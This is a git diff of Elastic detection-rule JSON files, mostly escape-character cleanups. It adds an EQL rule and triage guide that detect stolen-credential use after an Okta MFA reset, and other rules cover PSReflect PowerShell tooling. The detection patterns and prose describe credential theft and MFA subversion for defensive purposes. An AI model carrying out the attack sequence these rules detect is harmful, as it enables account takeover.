"TA0006", "name": "Credential Access", @@ -77,7 +77,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/55c2bf58-2a39-4c58-a384-c8b1978153c2_103.json b/packages/security_detection_engine/kibana/security_rule/55c2bf58-2a39-4c58-a384-c8b1978153c2_103.json index 87d8ba708e5..be02ed121bb 100644 --- a/packages/security_detection_engine/kibana/security_rule/55c2bf58-2a39-4c58-a384-c8b1978153c2_103.json +++ b/packages/security_detection_engine/kibana/security_rule/55c2bf58-2a39-4c58-a384-c8b1978153c2_103.json @@ -54,7 +54,7 @@ ], "risk_score": 73, "rule_id": "55c2bf58-2a39-4c58-a384-c8b1978153c2", - "setup": "The 'Audit Security System Extension' logging policy must be configured for (Success)\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nSystem \u003e\nAudit Security System Extension (Success)\n```", + "setup": "The 'Audit Security System Extension' logging policy must be configured for (Success)\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nSystem >\nAudit Security System Extension (Success)\n```", "severity": "high", "tags": [ "Elastic", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/55c2bf58-2a39-4c58-a384-c8b1978153c2_104.json b/packages/security_detection_engine/kibana/security_rule/55c2bf58-2a39-4c58-a384-c8b1978153c2_104.json index 6499139e8f7..0ec75e3428d 100644 --- a/packages/security_detection_engine/kibana/security_rule/55c2bf58-2a39-4c58-a384-c8b1978153c2_104.json +++ b/packages/security_detection_engine/kibana/security_rule/55c2bf58-2a39-4c58-a384-c8b1978153c2_104.json @@ -49,7 +49,7 @@ ], "risk_score": 73, "rule_id": "55c2bf58-2a39-4c58-a384-c8b1978153c2", - "setup": "The 'Audit Security System Extension' logging policy must be configured for (Success)\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nSystem \u003e\nAudit Security System Extension (Success)\n```", + "setup": "The 'Audit Security System Extension' logging policy must be configured for (Success)\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nSystem >\nAudit Security System Extension (Success)\n```", "severity": "high", "tags": [ "Elastic", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/55c2bf58-2a39-4c58-a384-c8b1978153c2_105.json b/packages/security_detection_engine/kibana/security_rule/55c2bf58-2a39-4c58-a384-c8b1978153c2_105.json index b7affe27f04..1f8c5318e24 100644 --- a/packages/security_detection_engine/kibana/security_rule/55c2bf58-2a39-4c58-a384-c8b1978153c2_105.json +++ b/packages/security_detection_engine/kibana/security_rule/55c2bf58-2a39-4c58-a384-c8b1978153c2_105.json @@ -49,7 +49,7 @@ ], "risk_score": 73, "rule_id": "55c2bf58-2a39-4c58-a384-c8b1978153c2", - "setup": "The 'Audit Security System Extension' logging policy must be configured for (Success)\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nSystem \u003e\nAudit Security System Extension (Success)\n```", + "setup": "The 'Audit Security System Extension' logging policy must be configured for (Success)\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nSystem >\nAudit Security System Extension (Success)\n```", "severity": "high", "tags": [ "Domain: Endpoint", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/55c2bf58-2a39-4c58-a384-c8b1978153c2_106.json b/packages/security_detection_engine/kibana/security_rule/55c2bf58-2a39-4c58-a384-c8b1978153c2_106.json index 7a0a68ebd86..168bf18d394 100644 --- a/packages/security_detection_engine/kibana/security_rule/55c2bf58-2a39-4c58-a384-c8b1978153c2_106.json +++ b/packages/security_detection_engine/kibana/security_rule/55c2bf58-2a39-4c58-a384-c8b1978153c2_106.json @@ -48,7 +48,7 @@ ], "risk_score": 73, "rule_id": "55c2bf58-2a39-4c58-a384-c8b1978153c2", - "setup": "\nThe 'Audit Security System Extension' logging policy must be configured for (Success)\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nSystem \u003e\nAudit Security System Extension (Success)\n```\n", + "setup": "\nThe 'Audit Security System Extension' logging policy must be configured for (Success)\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nSystem >\nAudit Security System Extension (Success)\n```\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/55d551c6-333b-4665-ab7e-5d14a59715ce_104.json b/packages/security_detection_engine/kibana/security_rule/55d551c6-333b-4665-ab7e-5d14a59715ce_104.json index 8b71c8d1d03..d877ee973cf 100644 --- a/packages/security_detection_engine/kibana/security_rule/55d551c6-333b-4665-ab7e-5d14a59715ce_104.json +++ b/packages/security_detection_engine/kibana/security_rule/55d551c6-333b-4665-ab7e-5d14a59715ce_104.json @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -100,7 +100,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/55d551c6-333b-4665-ab7e-5d14a59715ce_105.json b/packages/security_detection_engine/kibana/security_rule/55d551c6-333b-4665-ab7e-5d14a59715ce_105.json index 4f10f280810..68bf67998ba 100644 --- a/packages/security_detection_engine/kibana/security_rule/55d551c6-333b-4665-ab7e-5d14a59715ce_105.json +++ b/packages/security_detection_engine/kibana/security_rule/55d551c6-333b-4665-ab7e-5d14a59715ce_105.json @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -99,7 +99,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/55d551c6-333b-4665-ab7e-5d14a59715ce_106.json b/packages/security_detection_engine/kibana/security_rule/55d551c6-333b-4665-ab7e-5d14a59715ce_106.json index 8b1125fe504..c7529d2cab0 100644 --- a/packages/security_detection_engine/kibana/security_rule/55d551c6-333b-4665-ab7e-5d14a59715ce_106.json +++ b/packages/security_detection_engine/kibana/security_rule/55d551c6-333b-4665-ab7e-5d14a59715ce_106.json @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -100,7 +100,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/55d551c6-333b-4665-ab7e-5d14a59715ce_107.json b/packages/security_detection_engine/kibana/security_rule/55d551c6-333b-4665-ab7e-5d14a59715ce_107.json index d64af215e7c..37340a85686 100644 --- a/packages/security_detection_engine/kibana/security_rule/55d551c6-333b-4665-ab7e-5d14a59715ce_107.json +++ b/packages/security_detection_engine/kibana/security_rule/55d551c6-333b-4665-ab7e-5d14a59715ce_107.json @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -101,7 +101,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/55f07d1b-25bc-4a0f-aa0c-05323c1319d0_1.json b/packages/security_detection_engine/kibana/security_rule/55f07d1b-25bc-4a0f-aa0c-05323c1319d0_1.json index e3c147c91c2..c4d03c0c944 100644 --- a/packages/security_detection_engine/kibana/security_rule/55f07d1b-25bc-4a0f-aa0c-05323c1319d0_1.json +++ b/packages/security_detection_engine/kibana/security_rule/55f07d1b-25bc-4a0f-aa0c-05323c1319d0_1.json @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/56004189-4e69-4a39-b4a9-195329d226e9_1.json b/packages/security_detection_engine/kibana/security_rule/56004189-4e69-4a39-b4a9-195329d226e9_1.json index cdcf8419da6..8d7265a4002 100644 --- a/packages/security_detection_engine/kibana/security_rule/56004189-4e69-4a39-b4a9-195329d226e9_1.json +++ b/packages/security_detection_engine/kibana/security_rule/56004189-4e69-4a39-b4a9-195329d226e9_1.json @@ -36,7 +36,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/5610b192-7f18-11ee-825b-f661ea17fbcd_1.json b/packages/security_detection_engine/kibana/security_rule/5610b192-7f18-11ee-825b-f661ea17fbcd_1.json new file mode 100644 index 00000000000..a5bb9ec1b91 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5610b192-7f18-11ee-825b-f661ea17fbcd_1.json @@ -0,0 +1,108 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects a sequence of suspicious activities on Windows hosts indicative of credential compromise, followed by efforts to undermine multi-factor authentication (MFA) and single sign-on (SSO) mechanisms for an Okta user account.", + "false_positives": [ + "A Windows administrator may have triggered a low-fidelity credential access alert during a legitimate administrative action. Following this, the administrator may have reset the MFA credentials for themselves and then logged into the Okta console for AD directory services integration management." + ], + "from": "now-12h", + "index": [ + "filebeat-*", + "logs-okta*", + ".alerts-security.*", + "logs-endpoint.events.*" + ], + "interval": "6h", + "language": "eql", + "license": "Elastic License v2", + "name": "Stolen Credentials Used to Login to Okta Account After MFA Reset", + "note": "## Triage and analysis\n\n### Investigating Stolen Credentials Used to Login to Okta Account After MFA Reset\n\nThis rule detects a sequence of suspicious activities on Windows hosts indicative of credential compromise, followed by efforts to undermine multi-factor authentication (MFA) and single sign-on (SSO) mechanisms for an Okta user account.\n\nTypically, adversaries initially extract credentials from targeted endpoints through various means. Subsequently, leveraging social engineering, they may seek to reset the MFA credentials associated with an Okta account, especially in scenarios where Active Directory (AD) services are integrated with Okta. Successfully resetting MFA allows the unauthorized use of stolen credentials to gain access to the compromised Okta account. The attacker can then register their own device for MFA, paving the way for unfettered access to the user's Okta account and any associated SaaS applications. This is particularly alarming if the compromised account has administrative rights, as it could lead to widespread access to organizational resources and configurations.\n\n#### Possible investigation steps:\n- Identify the user account associated with the Okta login attempt by examining the `user.name` field.\n- Identify the endpoint for the Credential Access alert for this user by examining the `host.name` and `host.id` fields from the alert document.\n- Cross-examine the Okta user and endpoint user to confirm that they are the same person.\n- Reach out to the user to confirm if they have intentionally reset their MFA credentials recently or asked for help in doing so.\n- If the user is unaware of the MFA reset, incident response may be required immediately to prevent further compromise.\n\n### False positive analysis:\n- A Windows administrator may have triggered a low-fidelity credential access alert during a legitimate administrative action. Following this, the administrator may have reset the MFA credentials for themselves and then logged into the Okta console for AD directory services integration management.\n\n### Response and remediation:\n- If confirmed that the user did not intentionally have their MFA factor reset, deactivate the user account.\n- After deactivation, reset the user's password and MFA factor to regain control of the account.\n - Ensure that all user sessions are stopped during this process.\n- Immediately reset the user's AD password as well if Okta does not sync back to AD.\n- Forensic analysis on the user's endpoint may be required to determine the root cause of the compromise and identify the scope of the compromise.\n- Review Okta system logs to identify any other suspicious activity associated with the user account, such as creation of a backup account.\n- With the device ID captured from the MFA factor reset, search across all Okta logs for any other activity associated with the device ID.\n\n## Setup", + "query": "sequence by user.name with maxspan=12h\n [any where host.os.type == \"windows\" and signal.rule.threat.tactic.name == \"Credential Access\"]\n [any where event.dataset == \"okta.system\" and okta.event_type == \"user.mfa.factor.update\"]\n [any where event.dataset == \"okta.system\" and okta.event_type: (\"user.session.start\", \"user.authentication*\")]\n", + "references": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://www.elastic.co/security-labs/testing-okta-visibility-and-detection-dorothy", + "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "okta", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "okta.event_type", + "type": "keyword" + }, + { + "ecs": false, + "name": "signal.rule.threat.tactic.name", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "5610b192-7f18-11ee-825b-f661ea17fbcd", + "setup": "The Okta and Elastic Defend fleet integration structured data is required to be compatible with this rule. Directory services integration in Okta with AD synced is also required for this rule to be effective as it relies on triaging `user.name` from Okta and Elastic Defend events.", + "severity": "high", + "tags": [ + "Tactic: Persistence", + "Use Case: Identity and Access Audit", + "Data Source: Okta", + "Data Source: Elastic Defend", + "Rule Type: Higher-Order Rule", + "Domain: Endpoint", + "Domain: Cloud" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1556", + "name": "Modify Authentication Process", + "reference": "https://attack.mitre.org/techniques/T1556/", + "subtechnique": [ + { + "id": "T1556.006", + "name": "Multi-Factor Authentication", + "reference": "https://attack.mitre.org/techniques/T1556/006/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 1 + }, + "id": "5610b192-7f18-11ee-825b-f661ea17fbcd_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/56557cde-d923-4b88-adee-c61b3f3b5dc3_102.json b/packages/security_detection_engine/kibana/security_rule/56557cde-d923-4b88-adee-c61b3f3b5dc3_102.json index 71af2f5fd0e..a2476c121e0 100644 --- a/packages/security_detection_engine/kibana/security_rule/56557cde-d923-4b88-adee-c61b3f3b5dc3_102.json +++ b/packages/security_detection_engine/kibana/security_rule/56557cde-d923-4b88-adee-c61b3f3b5dc3_102.json @@ -47,7 +47,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/56557cde-d923-4b88-adee-c61b3f3b5dc3_103.json b/packages/security_detection_engine/kibana/security_rule/56557cde-d923-4b88-adee-c61b3f3b5dc3_103.json index cf7dcb14625..5e48826df07 100644 --- a/packages/security_detection_engine/kibana/security_rule/56557cde-d923-4b88-adee-c61b3f3b5dc3_103.json +++ b/packages/security_detection_engine/kibana/security_rule/56557cde-d923-4b88-adee-c61b3f3b5dc3_103.json @@ -47,7 +47,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/565c2b44-7a21-4818-955f-8d4737967d2e_102.json b/packages/security_detection_engine/kibana/security_rule/565c2b44-7a21-4818-955f-8d4737967d2e_102.json index 7077ac200bc..a446b0b8b60 100644 --- a/packages/security_detection_engine/kibana/security_rule/565c2b44-7a21-4818-955f-8d4737967d2e_102.json +++ b/packages/security_detection_engine/kibana/security_rule/565c2b44-7a21-4818-955f-8d4737967d2e_102.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/565c2b44-7a21-4818-955f-8d4737967d2e_103.json b/packages/security_detection_engine/kibana/security_rule/565c2b44-7a21-4818-955f-8d4737967d2e_103.json index 3b1deb6d481..8abe286ca0b 100644 --- a/packages/security_detection_engine/kibana/security_rule/565c2b44-7a21-4818-955f-8d4737967d2e_103.json +++ b/packages/security_detection_engine/kibana/security_rule/565c2b44-7a21-4818-955f-8d4737967d2e_103.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/565c2b44-7a21-4818-955f-8d4737967d2e_104.json b/packages/security_detection_engine/kibana/security_rule/565c2b44-7a21-4818-955f-8d4737967d2e_104.json index 1558b141dd7..4633a753c72 100644 --- a/packages/security_detection_engine/kibana/security_rule/565c2b44-7a21-4818-955f-8d4737967d2e_104.json +++ b/packages/security_detection_engine/kibana/security_rule/565c2b44-7a21-4818-955f-8d4737967d2e_104.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/565c2b44-7a21-4818-955f-8d4737967d2e_105.json b/packages/security_detection_engine/kibana/security_rule/565c2b44-7a21-4818-955f-8d4737967d2e_105.json index 88dee0966f1..6eb96f85e46 100644 --- a/packages/security_detection_engine/kibana/security_rule/565c2b44-7a21-4818-955f-8d4737967d2e_105.json +++ b/packages/security_detection_engine/kibana/security_rule/565c2b44-7a21-4818-955f-8d4737967d2e_105.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_102.json b/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_102.json index c0376f3abfd..00dd0af2bd4 100644 --- a/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_102.json +++ b/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_102.json @@ -42,7 +42,7 @@ ], "risk_score": 73, "rule_id": "565d6ca5-75ba-4c82-9b13-add25353471c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_103.json b/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_103.json index b9905266d50..4bc4f194137 100644 --- a/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_103.json +++ b/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_103.json @@ -42,7 +42,7 @@ ], "risk_score": 73, "rule_id": "565d6ca5-75ba-4c82-9b13-add25353471c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_104.json b/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_104.json index 652dd047e91..b7b2b26e509 100644 --- a/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_104.json +++ b/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_104.json @@ -42,7 +42,7 @@ ], "risk_score": 73, "rule_id": "565d6ca5-75ba-4c82-9b13-add25353471c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_105.json b/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_105.json index 3d0be8e33cc..1f806eadd72 100644 --- a/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_105.json +++ b/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_105.json @@ -41,7 +41,7 @@ ], "risk_score": 73, "rule_id": "565d6ca5-75ba-4c82-9b13-add25353471c", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_106.json b/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_106.json index caf3e32ea05..00bb1c91f66 100644 --- a/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_106.json +++ b/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_106.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/5663b693-0dea-4f2e-8275-f1ae5ff2de8e_103.json b/packages/security_detection_engine/kibana/security_rule/5663b693-0dea-4f2e-8275-f1ae5ff2de8e_103.json index e18da20ae0f..aee53f02ba2 100644 --- a/packages/security_detection_engine/kibana/security_rule/5663b693-0dea-4f2e-8275-f1ae5ff2de8e_103.json +++ b/packages/security_detection_engine/kibana/security_rule/5663b693-0dea-4f2e-8275-f1ae5ff2de8e_103.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/5663b693-0dea-4f2e-8275-f1ae5ff2de8e_104.json b/packages/security_detection_engine/kibana/security_rule/5663b693-0dea-4f2e-8275-f1ae5ff2de8e_104.json index abc96782c64..5417e3fdf6c 100644 --- a/packages/security_detection_engine/kibana/security_rule/5663b693-0dea-4f2e-8275-f1ae5ff2de8e_104.json +++ b/packages/security_detection_engine/kibana/security_rule/5663b693-0dea-4f2e-8275-f1ae5ff2de8e_104.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_105.json b/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_105.json index 4bc5b4a6be2..55dec6bce36 100644 --- a/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_105.json +++ b/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_105.json @@ -15,7 +15,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "PowerShell PSReflect Script", - "note": "## Triage and analysis\n\n### Investigating PowerShell PSReflect Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nPSReflect is a library that enables PowerShell to access win32 API functions in an uncomplicated way. It also helps to create enums and structs easily\u2014all without touching the disk.\n\nAlthough this is an interesting project for every developer and admin out there, it is mainly used in the red team and malware tooling for its capabilities.\n\nDetecting the core implementation of PSReflect means detecting most of the tooling that uses Windows API through PowerShell, enabling defenders to discover tools being dropped in the environment.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics. The script content that may be split into multiple script blocks (you can use the field `powershell.file.script_block_id` for filtering).\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Check for additional PowerShell and command-line logs that indicate that imported functions were run.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n- PowerShell Suspicious Script with Audio Capture Capabilities - 